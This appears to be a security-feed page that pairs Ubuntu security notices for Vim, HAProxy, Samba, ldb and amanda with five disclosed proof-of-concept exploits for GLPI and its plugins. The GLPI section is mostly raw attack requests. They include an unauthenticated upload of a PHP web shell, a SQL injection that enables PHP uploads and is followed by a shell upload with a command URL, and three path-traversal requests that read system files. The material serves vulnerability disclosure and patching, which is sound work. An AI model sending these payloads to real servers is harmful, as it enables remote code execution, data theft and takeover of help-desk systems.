Ubuntu Security Notice 5995-1 - It was discovered that Vim incorrectly handled memory when opening certain files. If an attacker could trick a user into opening a specially crafted file, it could cause Vim to crash, or possible execute arbitrary code. This issue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

    =========================================================================Ubuntu Security Notice USN-5995-1April 04, 2023vim vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 14.04 ESMSummary:Several security issues were fixed in Vim.Software Description:- vim: Vi IMproved - enhanced vi editorDetails:It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS,and Ubuntu 22.04 LTS. (CVE-2022-0413, CVE-2022-1629, CVE-2022-1674,CVE-2022-1733, CVE-2022-1735, CVE-2022-1785, CVE-2022-1796, CVE-2022-1851,CVE-2022-1898, CVE-2022-1942, CVE-2022-1968, CVE-2022-2124, CVE-2022-2125,CVE-2022-2126, CVE-2022-2129, CVE-2022-2175, CVE-2022-2183, CVE-2022-2206,CVE-2022-2304, CVE-2022-2345, CVE-2022-2581)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04LTS. (CVE-2022-1720, CVE-2022-2571, CVE-2022-2845, CVE-2022-2849,CVE-2022-2923)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-1927,CVE-2022-2344)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS,and Ubuntu 22.10. (CVE-2022-2946)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10.(CVE-2022-2980)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  vim                             2:9.0.0242-1ubuntu1.3  vim-athena                      2:9.0.0242-1ubuntu1.3  vim-gtk3                        2:9.0.0242-1ubuntu1.3  vim-motif                       2:9.0.0242-1ubuntu1.3  vim-nox                         2:9.0.0242-1ubuntu1.3  vim-tiny                        2:9.0.0242-1ubuntu1.3Ubuntu 22.04 LTS:  vim                             2:8.2.3995-1ubuntu2.5  vim-athena                      2:8.2.3995-1ubuntu2.5  vim-gtk                         2:8.2.3995-1ubuntu2.5  vim-gtk3                        2:8.2.3995-1ubuntu2.5  vim-nox                         2:8.2.3995-1ubuntu2.5  vim-tiny                        2:8.2.3995-1ubuntu2.5Ubuntu 20.04 LTS:  vim                             2:8.1.2269-1ubuntu5.13  vim-athena                      2:8.1.2269-1ubuntu5.13  vim-gtk                         2:8.1.2269-1ubuntu5.13  vim-gtk3                        2:8.1.2269-1ubuntu5.13  vim-nox                         2:8.1.2269-1ubuntu5.13  vim-tiny                        2:8.1.2269-1ubuntu5.13Ubuntu 18.04 LTS:  vim                             2:8.0.1453-1ubuntu1.12  vim-athena                      2:8.0.1453-1ubuntu1.12  vim-gnome                       2:8.0.1453-1ubuntu1.12  vim-gtk                         2:8.0.1453-1ubuntu1.12  vim-gtk3                        2:8.0.1453-1ubuntu1.12  vim-nox                         2:8.0.1453-1ubuntu1.12  vim-tiny                        2:8.0.1453-1ubuntu1.12Ubuntu 14.04 ESM:  vim                             2:7.4.052-1ubuntu3.1+esm8  vim-athena                      2:7.4.052-1ubuntu3.1+esm8  vim-gnome                       2:7.4.052-1ubuntu3.1+esm8  vim-gtk                         2:7.4.052-1ubuntu3.1+esm8  vim-nox                         2:7.4.052-1ubuntu3.1+esm8  vim-tiny                        2:7.4.052-1ubuntu3.1+esm8In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5995-1  CVE-2022-0413, CVE-2022-1629, CVE-2022-1674, CVE-2022-1720,  CVE-2022-1733, CVE-2022-1735, CVE-2022-1785, CVE-2022-1796,  CVE-2022-1851, CVE-2022-1898, CVE-2022-1927, CVE-2022-1942,  CVE-2022-1968, CVE-2022-2124, CVE-2022-2125, CVE-2022-2126,  CVE-2022-2129, CVE-2022-2175, CVE-2022-2183, CVE-2022-2206,  CVE-2022-2304, CVE-2022-2344, CVE-2022-2345, CVE-2022-2571,  CVE-2022-2581, CVE-2022-2845, CVE-2022-2849, CVE-2022-2923,  CVE-2022-2946, CVE-2022-2980Package Information:  https://launchpad.net/ubuntu/+source/vim/2:9.0.0242-1ubuntu1.3  https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.5  https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.13  https://launchpad.net/ubuntu/+source/vim/2:8.0.1453-1ubuntu1.12

Ubuntu Security Notice USN-5995-1

Ubuntu Security Notice 5994-1 - It was discovered that HAProxy incorrectly initialized certain connection buffers. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5994-1  
April 03, 2023

haproxy vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

HAProxy could be made to expose sensitive information over the network.

Software Description:  
- haproxy: fast and reliable load balancing reverse proxy

Details:

It was discovered that HAProxy incorrectly initialized certain connection  
buffers. A remote attacker could possibly use this issue to obtain  
sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   haproxy                         2.4.18-1ubuntu1.3

Ubuntu 22.04 LTS:  
   haproxy                         2.4.18-0ubuntu1.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5994-1  
   CVE-2023-0836

Package Information:  
   https://launchpad.net/ubuntu/+source/haproxy/2.4.18-1ubuntu1.3  
   https://launchpad.net/ubuntu/+source/haproxy/2.4.18-0ubuntu1.3

Ubuntu Security Notice USN-5994-1

Ubuntu Security Notice 5993-1 - Demi Marie Obenour discovered that the Samba LDAP server incorrectly handled certain confidential attribute values. A remote authenticated attacker could possibly use this issue to obtain certain sensitive information. Andrew Bartlett discovered that the Samba AD DC admin tool incorrectly sent passwords in cleartext. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5993-1  
April 03, 2023

samba vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Samba could be made to expose sensitive information over the network.

Software Description:  
- samba: SMB/CIFS file, print, and login server for Unix

Details:

Demi Marie Obenour discovered that the Samba LDAP server incorrectly  
handled certain confidential attribute values. A remote authenticated  
attacker could possibly use this issue to obtain certain sensitive  
information. (CVE-2023-0614)

Andrew Bartlett discovered that the Samba AD DC admin tool incorrectly  
sent passwords in cleartext. A remote attacker could possibly use this  
issue to obtain sensitive information. (CVE-2023-0922)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   samba                           2:4.16.8+dfsg-0ubuntu1.1

Ubuntu 22.04 LTS:  
   samba                           2:4.15.13+dfsg-0ubuntu1.1

Ubuntu 20.04 LTS:  
   samba                           2:4.15.13+dfsg-0ubuntu0.20.04.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5993-1  
   CVE-2023-0614, CVE-2023-0922

Package Information:  
   https://launchpad.net/ubuntu/+source/samba/2:4.16.8+dfsg-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/samba/2:4.15.13+dfsg-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/samba/2:4.15.13+dfsg-0ubuntu0.20.04.2

Ubuntu Security Notice USN-5993-1

Ubuntu Security Notice 5992-1 - Demi Marie Obenour discovered that ldb, when used with Samba, incorrectly handled certain confidential attribute values. A remote authenticated attacker could possibly use this issue to obtain certain sensitive information.

    ==========================================================================Ubuntu Security Notice USN-5992-1April 03, 2023ldb vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:ldb could be made to expose sensitive information over the network.Software Description:- ldb: LDAP-like embedded databaseDetails:Demi Marie Obenour discovered that ldb, when used with Samba, incorrectlyhandled certain confidential attribute values. A remote authenticatedattacker could possibly use this issue to obtain certain sensitiveinformation.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   libldb2                         2:2.4.4-0ubuntu0.22.04.2Ubuntu 20.04 LTS:   libldb2                         2:2.4.4-0ubuntu0.20.04.2After a standard system update you need to restart applications using ldb,such as Samba, to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5992-1   CVE-2023-0614Package Information:   https://launchpad.net/ubuntu/+source/ldb/2:2.4.4-0ubuntu0.22.04.2   https://launchpad.net/ubuntu/+source/ldb/2:2.4.4-0ubuntu0.20.04.2

Ubuntu Security Notice USN-5992-1

Ubuntu Security Notice 5966-3 - USN-5966-1 fixed vulnerabilities in amanda. Unfortunately that update caused a regression and was reverted in USN-5966-2. This update provides security fixes for Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-5966-3  
April 03, 2023

amanda regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in amanda.

Software Description:  
- amanda: Advanced Maryland Automatic Network Disk Archiver (Client)

Details:

USN-5966-1 fixed vulnerabilities in amanda. Unfortunately that update  
caused a regression and was reverted in USN-5966-2. This update provides  
security fixes for Ubuntu 22.10, Ubuntu 22.04 LTS, Ubuntu 20.04  
LTS and Ubuntu 18.04 LTS.

We apologize for the inconvenience.

Original advisory details:

Maher Azzouzi discovered an information disclosure vulnerability in the  
calcsize binary within amanda. calcsize is a suid binary owned by root that  
could possibly be used by a malicious local attacker to expose sensitive  
file system information. (CVE-2022-37703)

Maher Azzouzi discovered a privilege escalation vulnerability in the  
rundump binary within amanda. rundump is a suid binary owned by root that  
did not perform adequate sanitization of environment variables or  
commandline options and could possibly be used by a malicious local  
attacker to escalate privileges. (CVE-2022-37704)

Maher Azzouzi discovered a privilege escalation vulnerability in the runtar  
binary within amanda. runtar is a suid binary owned by root that did not  
perform adequate sanitization of commandline options and could possibly be  
used by a malicious local attacker to escalate privileges. (CVE-2022-37705)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
amanda-client 1:3.5.1-9ubuntu0.3

Ubuntu 22.04 LTS:  
amanda-client 1:3.5.1-8ubuntu1.3

Ubuntu 20.04 LTS:  
amanda-client 1:3.5.1-2ubuntu0.3

Ubuntu 18.04 LTS:  
amanda-client 1:3.5.1-1ubuntu0.3

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-5966-3  
https://ubuntu.com/security/notices/USN-5966-1  
https://launchpad.net/bugs/2012536  
CVE-2022-37703, CVE-2022-37704, CVE-2022-37705

Package Information:  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-9ubuntu0.3  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-8ubuntu1.3  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-2ubuntu0.3  
https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-1ubuntu0.3

Ubuntu Security Notice USN-5966-3

GLPI Cartography versions prior to 6.0.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: GLPI  Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)# Date of found: 11 Jun 2022# Application: GLPI Cartography < 6.0.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/positions# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-34128# PoCPOST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Length: 39Origin: http://192.168.56.113Connection: close<?php echo system($_GET["cmd"]); ?>

GLPI Cartography Shell Upload

GLPI versions 10.0.0 through 10.0.2 suffer from a remote SQL injection vulnerability that can lead to remote code execution.

    # ADVISORY INFORMATION# Exploit Title: GLPI  v10.0.2 - SQL Injection (Authentication Depends on Configuration)# Date of found: 11 Jun 2022# Application: GLPI >=10.0.0, < 10.0.3# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/glpi-project/glpi# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-31056# PoCPOST /front/change.form.php HTTP/1.1Host: acme.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156Content-Length: 4836Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="id"0-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="_glpi_csrf_token"752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="_actors"{"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]}-----------------------------190705055020145329172298897156--If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. HTTP GET request required to trigger the issue is as follows.POST /ajax/fileupload.php HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7X-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841Content-Length: 559Origin: http://acme.comCookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="name"_uploader_filename-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="showfilesize"1-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php"Content-Type: application/x-phpOutput:  <?php echo system($_GET['cmd']); ?>-----------------------------102822935214007887302871396841--# POC URLhttp://192.168.56.113/files/_tmp/poc.php?cmd=

GLPI 10.0.2 SQL Injection / Remote Code Execution

GLPI Activity versions prior to 3.1.0 suffer from a local file inclusion vulnerability.

    # Exploit Title: GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin# Date of found: 11 Jun 2022# Application: GLPI Activity < 3.1.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/activity# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34125# PoCGET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: close

GLPI Activity Local File Inclusion

GLPI Glpiinventory versions 1.0.1 and below suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion  # Date of found: 11 Jun 2022# Application: GLPI Glpiinventory <= 1.0.1# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/glpi-project/glpi-inventory-plugin# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-31062# PoCPOST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

GLPI Glpiinventory 1.0.1 Local File Inclusion

GLPI Manageentities versions prior to 4.0.2 suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin# Date of found: 11 Jun 2022# Application: GLPI Manageentities < 4.0.2# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/manageentities# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34127# PoCGET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

Tag

#ubuntu